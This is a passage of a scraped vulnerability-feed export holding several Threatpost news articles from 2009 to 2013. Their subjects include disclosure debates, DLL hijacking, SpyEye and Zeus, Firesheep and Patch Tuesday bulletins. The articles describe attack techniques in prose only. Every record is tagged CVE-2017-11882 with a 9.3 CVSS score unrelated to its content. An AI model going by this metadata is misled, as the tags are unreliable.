have to watch again on the video to fully understand how we got from Partial Disclosure to Dan Kaminsky saying \u201cMore people have died from windows crashing on them than from Windows crashing.\u201d But I promised my redux of the panel, so I will guide you down the path I think was most interesting.\n\n**[ **[**Partial disclosure, complete disagreement**](<https://threatpost.com/partial-disclosure-was-it-cat-i-saw-032309/>)** ]**\n\nThe disclosure issues around [Dan Kaminsky\u2019s DNS vulnerability](<http://www.ioactive.com/docs/CERTAdvisory.doc>) were one seed of the panel idea. If you are reading this blog, then I will assume that you\u2019ve heard of this vulnerability, else you must have been living under an Amish rock in a Luddite colony, high in the brisk, thin air of the Himalayas.\n\nAs far as the disclosure route he chose and how that played out, he executed a plan he thought was best in order to get vendors to fix a serious issue (they did), *and* to get as many affected customers protected (some were) with the fix in place before broadly releasing the technical details. He let a small number of people know the details, in the hopes that delivering those details to the right people and no one else would best protect the world\u2019s critical infrastructure. Hence, the term \u2018partial disclosure\u2019 was used to describe his approach. Other notable researchers [thought it was just hype](<http://twitter.com/tqbf/statuses/853104857>), [then took it back once they had spoken to Dan](<http://www.matasano.com/log/1089/dan-kaminsky-could-have-made-hundreds-of-thousands-of-dollars-with-this-dns-flaw/>), [some pretty much figured it out on their own](<http://addxorrol.blogspot.com/2008/07/on-dans-request-for-no-speculation.html>), or [chatted about it on DailyDave](<http://lists.immunitysec.com/pipermail/dailydave/2008-July/thread.html>). It was [weaponized](<http://blog.metasploit.com/2008/07/bailiwicked.html>) shortly thereafter, and a couple weeks after his initial announcement, some affected people had applied the update and some unfortunately hadn\u2019t. There were certainly more details I\u2019m skipping here, but that\u2019s the skinny.\n\nNow that the panel stage was set, here\u2019s one of the topics I thought was interesting.\n\nIn our introductions, we each counted ourselves among the security research community. Some of us had also been or still are consultants, all of us had done the startup thing, and some of us had been in charge of running some kind of computing infrastructure. \nAt the risk of sounding immodest, I believe I had a unique perspective on the topic of responsible disclosure as I was the only panel member who has been, at various stages in my career, a vulnerability Finder, Coordinator, and a Vendor (for both open and closed source software).\n\nLet my official punditry from this pugnacious pulpit begin. \ud83d\ude09\n\nIt was interesting to me that the panelist who most strongly endorsed \u201cinflicting pain\u201d in the form of exploit release in order to provide the necessary \u201cwake up call\u201d to vendors had never been responsible for maintaining any kind of infrastructure deployment. We all know how much easier it is to break something than it is to build it or to fix it, yet there is a pervasive attitude among many security researchers that nothing should be more important than security, not even the business itself.\n\nAnd that\u2019s where our disagreement\u2019s footing took a stronger hold on its rocky purchase. Define pain, our moderator asked. Who decides on the form the pain will take and how intense or widespread it is, I asked.\n\nSure, it took some [pain](<http://news.cnet.com/At-software-giant,-pain-gives-rise-to-progress/2009-7349_3-6220566.html>) to get the [attention](<http://blogs.msdn.com/sdl/archive/2009/02/18/early-days-of-the-sdl-part-one.aspx>) of software vendors to fix their products and [build security in from the ground up](<http://blogs.msdn.com/sdl>). But as security folks, aren\u2019t we tired of having to use the same arguments of active, widespread exploitation to*prove* that something needs to be done? Security people often complain that not enough has changed since the [epoch began](<http://en.wikipedia.org/wiki/Unix_epoch>), but if that\u2019s true, then why have we not looked at ways to stop beating our heads upon the supposed brick wall of vendors or deployers of technology, and instead tried something different to get the right eyes on the right issues at the right time to do the right thing? Doesn\u2019t executing the same behavior over and over again but expecting different results equal insanity? When are we willing to stop the madness?\n\nAt the end of the panel we were each asked to describe our security utopia. My Shangri-La was this: I would like to see more cross-over among those of us who say the sky is falling and those of us upon whom the sky will fall.\n\nCommunication between two groups with different mindsets requires a [lingua franca](<http://www.emergentchaos.com/archives/2009/02/boundary_objects_and_thre.html>) other than exploitation. One might think that math is the language of the universe, and Proof of Concept serves as the mathematical proof needed for anyone and everyone to arrive at the logical conclusion of \u201cdrop everything NOW and create (if you\u2019re a vendor) or apply (if you\u2019re managing infrastructure) the update.\u201d Before I had ever been responsible for building anything or protecting anything, I might have agreed with that, since it made perfect logical sense to me at the time, in the context within which I worked.\n\nBut it\u2019s not doing the trick of convincing all vendors and all deployers by a long shot, so obviously, we need something to change. PoC can and should be part of the conversation between responsible researchers and people to whom they are reporting the issues, but it must be framed appropriately for the listener. PoC is not that simple for non-security types to immediately frame the same way we do as security people. Even if they do grok the severity of the situation, they may not be *able* to move as quickly as a researcher feels they should.\n\nConsider this, researcher-types: If you\u2019ve never managed infrastructure before, or been responsible for shipping and maintaining complex and widely deployed code, then you don\u2019t have the context to understand why there are sometimes legitimate reasons to do things more carefully and therefore more slowly. Once the talk recordings are posted, check out the very thorough treatise by our own MSRC on [How Microsoft Fixes Security Vulnerabilities: Everything you wanted to know about the MSRC Security Update Engineering Process](<http://www.sourceconference.com/index.php/source-boston-2009/boston-2009-sessions>). Think about how you as a researcher and security expert would react if some CTO or IT person or developer who lacks your depth of security knowledge and subject matter expertise came and told you what to hack, how to hack, and at what pace to hack it? That\u2019s essentially what you\u2019re doing when you say \u201cyou should be able to fix it and fix it now, and if you don\u2019t do it on my timeline, then you obviously need to be made an example of so I\u2019m going to release an exploit for it into the wild.\u201d\n\nThey don\u2019t swim in your security research toilet :-), so why must you pee in their development or infrastructure pool?\n\nOkay, I couldn\u2019t resist making the joke \u2013 and no, I don\u2019t think [security research is a cesspool](<http://spiresecurity.typepad.com/spire_security_viewpoint/2005/03/not_again.html>), or I wouldn\u2019t have [founded two vulnerability research programs](<http://blogs.msdn.com/sdl/pages/about-us.aspx#k8e>) in my career. What I am saying is that all of us should be striving for the delicious harmony of combining your chocolate with my peanut butter, your gin and my tonic, your milk and my shake, in order to make the whole greater than the sum of its parts. As a researcher, one can choose to be the sabot and grind gears to a halt to prove a point, or one can be the grease that moves things along with less friction, earning the trust that will allow each subsequent notification pill to be swallowed more easily. As a developer or deployer, one can choose to stuff up one\u2019s ears until someone firmly inserts an icepick, or one can strive to fix things as quickly and safely as possible and learn from the experience to continually improve and speed up that process over time.\n\nWe need a better way to reach our common ground of protecting the computing environment on which we all rely. Researchers need a means by which to communicate urgency that avoids descriptive hyperbole or causes damage, which erodes trust. Developers and deployers need a better way to service existing code and infrastructure reliably, safely, and rapidly if necessary, to build trust among the researcher and customer communities that they are doing the best they can at any given time. Around here, we\u2019ve done serious work on making this a reality on the development front, with the dual-ninjas of SDL (proactive) and MSRC (reactive). I\u2019d like to see SDL someday brought up to a full double-D in the form of a Secure Development and Deployment Lifecycle, to build infrastructure design and servicing models that are resilient in the face of threats to deployments as well as software. Perhaps I can begin to work on this here at Microsoft, if I can get some of my [other work done first](<http://blogs.msdn.com/sdl/archive/2008/09/11/new-addition-to-the-starting-line-up.aspx>). \ud83d\ude42\n\nAfter we had each said our peace on what our security utopia looked like, that\u2019s where we left things. No agreement could be reached in the two hours or so we were on the stage, which is no surprise. If the tape ran out before the end, then you won\u2019t get to see us literally \u201chug it out\u201d after all was said and done, disagreements notwithstanding. I continue to have tremendous respect and share camaraderie with my fellow panelists and with researchers around the world. It is my hope that the determination and vision of those on any side of the equation who can see across the role boundaries of researcher, vendor, and deployer will usher us into a new age.\n\nPeople often ask what more is there to say about disclosure that hasn\u2019t already all been said. I think the real conversation on how to get the results we all desire \u2013 to get things fixed *in spite of* our disagreement \u2013 has yet to truly begin.\n\nI\u2019m listening, as well as talking. Are you?\n\n_* [Katie Moussouris](<http://blogs.msdn.com/katie_moussouris>) is a senior security program manager in Microsoft\u2019s Secure Development Lifecycle (SDL) team. \n_\n\n_Photo credit: Microsoft._\n", "cvss3": {}, "published": "2009-03-23T20:02:26", "type": "threatpost", "title": "Partial disclosure: Was it a cat I saw?", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-03T17:57:44", "id": "THREATPOST:27F8092D2D7E88CBD23EAF8A7A016E24", "href": "https://threatpost.com/partial-disclosure-was-it-cat-i-saw-032309/72387/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:10", "description": "[](<https://threatpost.com/dll-hijacking-exploit-code-posted-powerpoint-other-apps-082410/>)A day after [Microsoft released information on the remotely exploitable DLL-hijacking vulnerability](<https://www.microsoft.com/technet/security/advisory/2269637.mspx>) that affects dozens of Windows applications, researchers are starting to discover exactly which pieces of software are vulnerable. The list so far includes PowerPoint, Wireshark and some applications that are included by default with Windows Vista, and possibly Windows 7.\n\nThe class of vulnerabilities that is being described as DLL hijacking or DLL preloading enables an attacker to hide a malicious DLL in a directory on a network or WebDAV share and convincing a user to open a file that will silently load the DLL. The vulnerability itself has been known for at least 10 years, but Microsoft officials had considered it a low-impact flaw because it was thought that an attacker would only be able to exploit it locally. However, researchers such as Aviv Raff and others have shown in recent years that it could be exploited remotely under some circumstances.\n\nAnd late last week HD Moore of the Metasploit Project and Rapid7 said that he\u2019d found other reliable ways to remotely exploit the flaw and had identified 40 or so Windows applications that are vulnerable. Moore detailed his findings in a [blog post](<http://blog.rapid7.com/?p=5325>) Tuesday. Now, information is beginning to filter out about exactly which applications are vulnerable, along with exploit code for some of them.\n\nEarly Tuesday, exploit code for the DLL hijacking flaw was posted for both [Microsoft PowerPoint](<http://www.exploit-db.com/exploits/14723/>) and [Wireshark](<http://www.exploit-db.com/exploits/14721/>), a network protocol analyzer. Raff also said [in a message on Twitter](<https://twitter.com/avivra/statuses/21994799124>) Tuesday that some software included with Windows Vista, and possibly Windows 7, is vulnerable to the attack. Microsoft has not released a list of which applications are known to be vulnerable to the DLL-hijacking flaw, nor has Moore. \n\nWhile Microsoft is in the process of continuing its investigation into the class of flaws, the company has published a description of the problem, along with a [tool that can help mitigate the DLL-hijacking vulnerability](<http://support.microsoft.com/kb/2264107>). Moore also has [released an audit tool](<http://blog.rapid7.com/?p=5325>) that can identify vulnerable applications on a local system. \n\n**[See: [HD Moore on the Windows DLL Vulnerability podcast](<https://threatpost.com/dll-hijacking-exploit-code-posted-powerpoint-other-apps-082410/>)]**\n\n\u201cWhen an application loads a DLL without specifying a fully qualified \npath name, Windows will attempt to locate the DLL by searching a defined \nset of directories. We have discussed the DLL search path [on this blog](<http://blogs.technet.com/b/srd/archive/2009/04/14/ms09-014-addressing-the-safari-carpet-bomb-vulnerability.aspx>) and it has also been explained well on [David LeBlanc\u2019s blog](<http://blogs.msdn.com/b/david_leblanc/archive/2008/02/20/dll-preloading-attacks.aspx>). \nFor the sake of this issue, its sufficient to say that if an attacker \ncan cause an application to LoadLibrary() while the application\u2019s \ncurrent directory is set to an attacker-controlled directory, the \napplication will run the attacker\u2019s code.[ Development best practices ](<http://msdn.microsoft.com/en-us/library/ff919712%28VS.85%29.aspx>)state \nthat applications should call SetDllDirectory with a blank path before \ncalling LoadLibrary(\u201cfoo.dll\u201d) to ensure that foo.dll is not loaded from \nthe current directory. We are investigating whether any of our own \napplications are affected by this class of vulnerability so that we can \ntake appropriate action to protect customers,\u201d Microsoft\u2019s [Jonathan Ness said in a blog post](<http://blogs.technet.com/b/srd/>).\n\nThe first public mention of this class of vulnerabilities appears to have been an [advisory posted to BugTraq by researcher Georgi Guninski](<http://www.securityfocus.com/bid/1699/info>) in 2000, in which Guninski details the problem and lists dozens of versions of Windows that are susceptible to the attack. Raff also [discussed the DLL problem](<http://aviv.raffon.net/2006/12/14/IE7DLLloadHijackingCodeExecutionExploitPoC.aspx>) publicly back in 2006. \n", "cvss3": {}, "published": "2010-08-24T14:47:41", "type": "threatpost", "title": "DLL Hijacking Exploit Code Posted for PowerPoint, Other Apps", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:10:15", "id": "THREATPOST:F1E0D1BF5C51CAA730D94DB196D962D1", "href": "https://threatpost.com/dll-hijacking-exploit-code-posted-powerpoint-other-apps-082410/74370/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:38", "description": "[](<https://threatpost.com/spyeye-and-zeus-malware-married-or-living-separately-101411/>)Everyone knows that the first year of marriage can be a tough one -around three percent of them end in the first 12 months. Looks like the same can be true of malware marriages, with the union of the Zeus and SpyEye Trojan now in question.\n\nJust one year after news broke that the Zeus and SpyEye Trojan families had merged, virus experts say there\u2019s reason to question whether the union is still intact.\n\nResearchers at Microsoft and Kaspersky Lab told Threatpost that, although there\u2019s clearly evidence that code was shared between the two malware families, the rumored merger of Zeus and SpyEye never took place. In fact, the two botnets continue as separate entities, with some researchers wondering if they are even controlled by the same individuals or criminal groups.\n\nZeus and SpyEye were the two main families of botnet software, with SpyEye [playing the role of upstart competitor to the more established Zeus](<https://threatpost.com/tracker-spyeye-not-yet-zeus-stature-110910/>). For a while, the competition for online hosts was intense, with [both malware families adding features to remove the other on systems they infected](<https://threatpost.com/malware-trojan-wars-spyeye-vs-zeus-040110/>).\n\nThat rivalry seemed to end in October, 2010, when researchers observed what appeared to be a merger of the two crime kits, around the same time that the author of the Zeus botnet decided to release the malware code as an open source repository. Those reports were backed by online forum posts by the SpyEye author claiming that the Zeus source code had been turned over to him and that the two Trojans [would soon be \u201cmerged into one powerful Trojan](<http://krebsonsecurity.com/2010/10/spyeye-v-zeus-rivalry-ends-in-quiet-merger/>).\u201d\n\nBy the end of 2010, an update to the SpyEye crimeware toolkit (1.3.X) included a feature, formerly unique to the Zeus crime kit, that targeted an anti-Trojan agent developed by the firm Trusteer. The new version of SpyEye also removed a feature to remove the Zeus malware if it was found running on the affected machine, Microsoft said.\n\nDespite some early reports that a merged SpyEye/Zeus Trojan was circulating online, the promised merger never happened, beyond some basic cutting and pasting of code. In fact, subsequent reports suggested that the two malware families were [continuing down separate tracks, with Zeus adding new features not seen in the other](<https://threatpost.com/zeus-malware-not-dead-yet-new-features-being-added-030411/>).\n\nNow Microsoft says that reports of the merger may have been overblown. In a post Tuesday on the company\u2019s Threat Research and Response Blog, researchers said that they considered reports of the union to be \u201cspeculative\u201d and saw little evidence that Zeus and SpyEye were sharing code.\n\nThe company declined to discuss the specifics of its research, but stood by the statement in its blog post.\n\nDmitry Tarakanov, a researcher at Kaspersky Lab who has studied the two families said that there was a code transfer from Zeus to SpyEye in the immediate aftermath of the source code being transferred to the SpyEye author. For example, the SpyEye author grabbed a Zeus feature that allowed the malware to force Web browsers on infected systems to load malicious HTML served by the botnet, even in cases where the host had a recent version of the page in question (say, an electronic banking site) stored locally in its browser cache. \u201cSpyEye could not intercept the cached html-code,\u201d Tarakanov wrote in an e-mail. \u201cSo the author of Spyeye had seen that part of the code where Zeus replaces the cache as well and added that part of code into his own source code of SpyEye.\u201d\n\nBut there\u2019s little evidence of further consolidation of the two code bases after that, he said. \u201cWe can make a conclusion that author of SpyEye did not even try to concoct one bot squeezing all the best from two source codes,\u201d he wrote.\n\nTarakanov said he believes the original author of Zeus was interested in washing his hands of the malware industry, especially with increased attention to the Zeus malware by law enforcement. In September, 2010, more than 60 individuals were charged in the U.S. and U.K. for crimes linked to the Zeus botnet. That may have chased the bot\u2019s original author into hiding.\n\nHuman nature may explain the SpyEye author\u2019s failure to carry out a grand union of the two botnets that was originally promised. \u201cPeople tend not to change work,\u201d Tarakanov wrote. In other words: \u2018if it ain\u2019t broke, don\u2019t fix it,\u2019 as the saying goes.\n\nHowever, its harder to explain the subsequent modifications to the Zeus code, which Tarakanov said are \u201ctoo serious and notable\u201d to be the work of amateurs. While its possible that the SpyEye author would choose to keep the malware families separate, its harder to understand why new features added to Zeus weren\u2019t also added to SpyEye. \u201cA programmer really does not like to code one thing twice. So, it\u2019s hard to believe that the author of SpyEye somehow developed new features (but different) for SpyEye and for Zeus,\u201d he wrote.\n\nOne possibility is that both tools are being offered to cyber criminals simultaneously, rather than requiring any one set of customers to adapt abandon their platform of choice, or asking everyone to switch to a new, merged platform. Aviv Raff, the CTO of Seculert, said in June that his researchers had found [evidence of back-end servers that are being used to host both the Zeus and SpyEye crimeware packs](<https://threatpost.com/malware-exploit-kit-writers-merging-their-talents-062411/>). Attackers who are interested in using one or the other can have their choice of which tool they\u2019d like to use at any given time, said Raff, who expects greater convergence of crime kits like SpyEye and Zeus and Web exploit kits in the future. \n\nIts also possible that main development of Zeus has been passed to a third party now that the malware source code is available online. \u201cThe situation is too muddy and there are too many conflicting arguments,\u201d Tarakanov said. \n", "cvss3": {}, "published": "2011-10-14T17:58:10", "type": "threatpost", "title": "SpyEye and Zeus Malware: Married Or Living Separately?", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:35", "id": "THREATPOST:9C03EBE552C67EF6E62604A81CF13C1A", "href": "https://threatpost.com/spyeye-and-zeus-malware-married-or-living-separately-101411/75755/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:45", "description": "Microsoft\u2019s Bing is looking into SSL and other privacy \nsettings for the next version of their search engine. Currently the site strips \nSSL when forced into HTTPS and in turn, brings up an advisory on browsers signaling \nan unsafe connection.\n\n[Introduced at Toorcon, the Firefox extension ](<https://threatpost.com/plugin-firesheep-lays-open-web-20-insecurity-102510/>)allows \nattackers to capture site cookies from users on unsecured wireless networks and \nbrowse under their logon. \n\nWith the advent of Firesheep and subsequently, its surge of recently \nconverted hackers, HTTP session hijacking is becoming more and more of a \nconcern. Sites like Bing will have to adopt suitable security techniques to \ncontend with the extensions\u2019 further proliferation. \n\nFirefox 4, scheduled for release by the end of the year will \nhelp. [As \nreported in August](<https://threatpost.com/firefox-4-include-http-strict-transport-security-support-082710/>), the browser will receive HTTP Strict Transport \nSecurity, ensuring the browser always requests a safe HTTPS session from sites. \nHowever If sites like Bing don\u2019t implement SSL into sites, the lack of full-end \nencryption will still be a problem and HTTPS won\u2019t even be an option.\n\n[Network \nWorld has more on this story.](<http://www.networkworld.com/community/blog/microsoft-considering-encryption-bing>)\n\n** \n**\n", "cvss3": {}, "published": "2010-10-29T19:51:24", "type": "threatpost", "title": "To Combat Firesheep, Microsoft's Bing Looking Into SSL", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:46", "id": "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "href": "https://threatpost.com/combat-firesheep-microsoft-s-bing-looking-ssl-102910/74624/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:54", "description": "Microsoft has released a new version of the MS13-036 patch that was causing some customers\u2019 machines to crash. The company had recommended in the days after the original fix was first released that customers [uninstall the MS13-036 patch](<http://threatpost.com/microsoft-uninstall-faulty-patch-tuesday-security-update-041213/>) while Microsoft investigated the cause of the problems.\n\nThe new fix that Microsoft released on Tuesday resolves some conflicts with third-party applications that apparently were causing the blue screen issues for some people. The company didn\u2019t specify which software was causing the crashes, but said that the update should resolve the problems.\n\n\u201cWe\u2019ve determined that the update, when paired with certain third-party software, can cause system errors,\u201d said Trustworthy Computing group manager Dustin Childs at the time that the patch was recalled earlier this month.\n\nThe MS13-036 patch fixes a pair of race condition vulnerabilities in the Windows kernel, both of which could be used for code execution. However, the patch was rated important rather than critical because an attacker would need physical access to a vulnerable machine in order to run code using one of these bugs.\n\nChilds said in a blog post Tuesday that customers should install the revised update as soon as possible.\n\n\u201cAs we [previously discussed](<http://blogs.technet.com/b/msrc/archive/2013/04/11/kb2839011-released-to-address-security-bulletin-update-issue.aspx> \"previously discussed\" ), we stopped distributing this update when we learned some customers were having issues. The new update, [KB2840149](<http://support.microsoft.com/kb/2840149> \"KB2840149\" ), still addresses the Moderate security issue described in MS13-036, and should not cause these issues. If you have automatic updates enabled, you won\u2019t need to take any actions. For those manually updating, we encourage you to apply this update at your earliest convenience,\u201d he said.\n", "cvss3": {}, "published": "2013-04-24T10:00:23", "type": "threatpost", "title": "Microsoft Releases Updated MS13-036 Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-24T14:02:36", "id": "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "href": "https://threatpost.com/microsoft-releases-updated-ms13-036-patch/99885/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:51", "description": "[](<https://threatpost.com/microsoft-releases-five-bulletins-september-patch-tuesday-091311/>)Microsoft on Tuesday released (again) the five security bulletins for its September Patch Tuesday. None of the fixes being released today is rated critical, with all five being rated important. Three of the bulletins fix flaws that could result in code execution.\n\nMicrosoft also updated the security bulletin it originally released a couple of weeks ago regarding the DigiNotar compromise, revoking trust for an additional six root certificates issued by the CA. The company removed trust for a number of certificates that were cross-signed by GTE and Entrust. Here is the list of certificates placed by Microsoft into the Untrusted Certificate Store:\n\n * DigiNotar Root CA\n * DigiNotar Root CA G2\n * DigiNotar PKIoverheid CA Overheid\n * DigiNotar PKIoverheid CA Organisatie \u2013 G2\n * DigiNotar PKIoverheid CA Overheid en Bedrijven\n * DigiNotar Root CA Issued by Entrust (2 certificates)*\n * DigiNotar Services 1024 CA Issued by Entrust*\n * Diginotar Cyber CA Issued by GTE CyberTrust (3 certificates)*\n\nThe five bulletins released by Microsoft on Tuesday include fixes for vulnerabilities in Windows, Office, Excel, Sharepoint and WINS. In an odd mistake, Microsoft on Friday accidentally made the link to the September bulletins live four days early. The page was only available for a short time before Microsoft removed it, but it was long enough for several sites to post the text of the advisories.\n", "cvss3": {}, "published": "2011-09-13T18:08:30", "type": "threatpost", "title": "Microsoft Releases Five Bulletins For September Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:47", "id": "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "href": "https://threatpost.com/microsoft-releases-five-bulletins-september-patch-tuesday-091311/75649/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:54", "description": "In the space of a given year, untold thousands of vulnerabilities are found in operating systems, applications and plug-ins. In many cases, the affected vendors fix the flaws, either with a patch, a workaround or some other mitigation. But there\u2019s also a huge population of security bugs that vendors never fix because they\u2019re deemed unexploitable, an assumption that may be turning into a serious mistake for software makers.\n\nMicrosoft made such a call earlier this year, after [researchers at Core Security](<http://www.coresecurity.com/content/virtual-pc-2007-hypervisor-memory-protection-bug>) informed the company that they had found a [vulnerability in the Microsoft Virtual PC software](<https://threatpost.com/microsoft-virtual-pc-flaw-lets-hackers-bypass-windows-defenses-031610/>). The flaw, which affected the virtual machine monitor (VMM) in Virtual PC, could enable an attacker to use applications running in user-space on a guest OS to access portions of the Virtual PC memory that should be inaccessible to those applications. This gives the attacker the ability to bypass anti-exploitation technologies in the underlying operating system and exploit flaws in the OS that otherwise would not be exploitable.\n\nThis problem was especially thorny for Microsoft because Virtual PC allows Windows 7 users to run applications designed for older Windows versions in a virtualized environment on their Windows 7 machines. This functionality has helped the deployment of Windows 7 in enterprise environments by making more legacy apps viable.\n\nBut Microsoft\u2019s security team said that the [Virtual PC problem was not actually a vulnerability](<http://windowsteamblog.com/blogs/windowssecurity/archive/2010/03/16/vulnerability-in-virtual-pc.aspx>) and the company hasn\u2019t released a fix for it. \n\n\u201cThe functionality that Core calls out **is not an actual vulnerability** \nper se. Instead, they are describing a way for an attacker to more \neasily exploit security vulnerabilities that must already be present on \nthe system. It\u2019s a subtle point, but one that folks should really \nunderstand. The protection mechanisms that are present in the Windows \nkernel are rendered less effective inside of a virtual machine as \nopposed to a physical machine. There is no vulnerability introduced, \njust a loss of certain security protection mechanisms,\u201d Microsoft\u2019s Paul Cooke wrote in a blog post at the time. \n\nSoftware companies large and small make these kinds of judgments on a daily basis during both the development process and the life span of a deployed product. The mere presence of a bug or vulnerability in an application doesn\u2019t mean that an attacker could necessarily use the flaw to compromise a system running the software. Plenty of bugs just cause the software to act flaky or become unstable or hang without offering an attacker any inroads into the machine. \n\nSo fixing these problems isn\u2019t always a top priority for software makers, especially if they\u2019re on tight deadlines or strict budgets. And there\u2019s always the compatibility problem to take into account: If a patch breaks some other service or feature in the application, then it may just infuriate users. So maybe all of that customer aggravation isn\u2019t worth it.\n\nThe difference in this case, experts say, is that the Virtual PC vulnerability is the symptom of a larger problem lurking beneath the surface: assuming that protections such as ASLR, DEP and SafeSEH will always be around to save us.\n\n\u201cWe\u2019re less worried about this particular vulnerability than we are \nabout the now-exposed (incorrect) assumption that various security \nmechanisms will always be in place. It\u2019s obvious that a complete \nre-calibration of exploit potential for uncategorized bugs will become \nnecessary if vulnerabilities like the one described here remain in our \nfielded systems. Not so good for Windows 7,\u201d Gary McGraw of Cigital and Ivan Arce of Core Security wrote in an [analysis of the Virtual PC situation](<http://www.informit.com/articles/article.aspx?p=1588145>) for InformIT. \n\n\u201cIn our view, design and architecture decisions made for Virtual PC \ncompletely invalidate some basic assumptions about processes in modern \nWindows operating systems. Like falling dominoes, this in turn \ninvalidates almost all anti-exploit mechanisms that Microsoft has built \ninto their OS over the past decade, which then topples over and turns an \nentire class of bugs deemed un-exploitable on non-virtualized systems \ninto potential vulnerabilities on virtualized systems. Backwards time \nwarp and a table full of fallen dominoes,\u201d they wrote.\n\nThis may seem an isolated, extreme case, but there have been other examples in the last few months of the same kind of assumptions being ground to pieces under the wheels of logic and ingenuity. After the disclosure of the high-profile attack on Google and other big companies last fall, word quickly leaked out that the flaw used to compromise the search giant was an unpatched problem in Internet Explorer. Several experts said the problem couldn\u2019t be exploited on IE 8 on Windows 7 because of the memory protections that Microsoft had added.\n\nWithin a few days, that was proven false as researcher Dino Dai Zovi, followed by others, used the [same exploit on a Windows 7 machine running IE 8](<https://threatpost.com/memory-protections-advance-exploits-stay-step-ahead-030810/>), a technique he demonstrated live at the RSA Conference in March. The point, Dai Zovi and others maintain, is that exploit mitigations are just that: mitigations.\n\n\u201cAttack mitigation takes the universe of exploit techniques and narrows \nit down,\u201d Dai Zovi said during his RSA talk.\u201dBut preventing the introduction of malicious code \nisn\u2019t enough to prevent malicious computations.\u201d\n\nThat\u2019s a point that\u2019s becoming ever clearer.\n\n\u201cMicrosoft claims that the Virtual PC problem \u2018isn\u2019t a vulnerability _per \nse_\u2018 because the problem described only affects \u201csecurity-in-depth\u201d \nmechanisms and attackers would need to find and exploit an actual \nimplementation bug to leverage it. Even if Microsoft is right on that \ncount (which we don\u2019t think they are), they are ignoring the bigger \nissue of assumptions. Bugs previously deemed non-exploitable for \nanything other than crashing systems are now potentially exploitable \nunder a virtualized OS. Because of the way bugs are slated for \nmitigation in the real world, a majority of those bugs remain unpatched \u2014 \na problem of prioritization and the enormity of the bug pile in \napplications,\u201d McGraw and Arce conclude.\n", "cvss3": {}, "published": "2010-05-03T19:10:03", "type": "threatpost", "title": "How Assumptions May Be Making Us All Less Secure", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:37:06", "id": "THREATPOST:77E27FE5A07B4C4146B818CE438E0AAA", "href": "https://threatpost.com/how-assumptions-may-be-making-us-all-less-secure-050310/73913/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:53", "description": "Microsoft has been busy of late, what with the scramble surrounding the [Flame malware](<https://threatpost.com/microsoft-details-flame-hash-collision-attack-060612/>) and the forged certificate that the attackers were able to use to spread the malware via a fake Windows Update service. Now, the company is planning to release seven bulletins next Tuesday covering 28 vulnerabilities in its [June Patch Tuesday](<http://technet.microsoft.com/en-us/security/bulletin/ms12-jun>).\n\nThree of the bulletins Microsoft will release are rated critical, and all of the vulnerabilities they cover can lead to remote code execution. The four other bulletins are rated important, and one of those can result in remote code execution. The seven bulletins will fix flaws in Windows, the .NET Framework, Microsoft Dynamics, Internet Explorer and Visual Basic for Applications.\n\nMicrosoft also will be rolling out a change to its Windows Update service in the coming days that is designed to harden the infrastructure and prevent the kind of attack that the Flame authors were able to pull off. That change will involve deploying a new certificate that will be the only one trusted by WU clients, and that certificate only will be used to protect WU files.\n\nHere\u2019s the list of the bulletins:\n\nBulletin ID | Maximum Severity Rating and Vulnerability Impact | Restart Requirement | Affected Software \n---|---|---|--- \nBulletin 1 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | Requires restart | Microsoft Windows \nBulletin 2 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | Requires restart | Microsoft Windows, \nInternet Explorer \nBulletin 3 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | May require restart | Microsoft Windows, \nMicrosoft .NET Framework \nBulletin 4 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | May require restart | Microsoft Office, \nMicrosoft Visual Basic for Applications \nBulletin 5 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nElevation of Privilege | May require restart | Microsoft Dynamics AX \nBulletin 6 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nElevation of Privilege | Requires restart | Microsoft Windows \nBulletin 7 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nElevation of Privilege | Requires restart | Microsoft Windows\n", "cvss3": {}, "published": "2012-06-07T17:29:16", "type": "threatpost", "title": "Microsoft to Fix 28 Vulnerabilities in June Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": 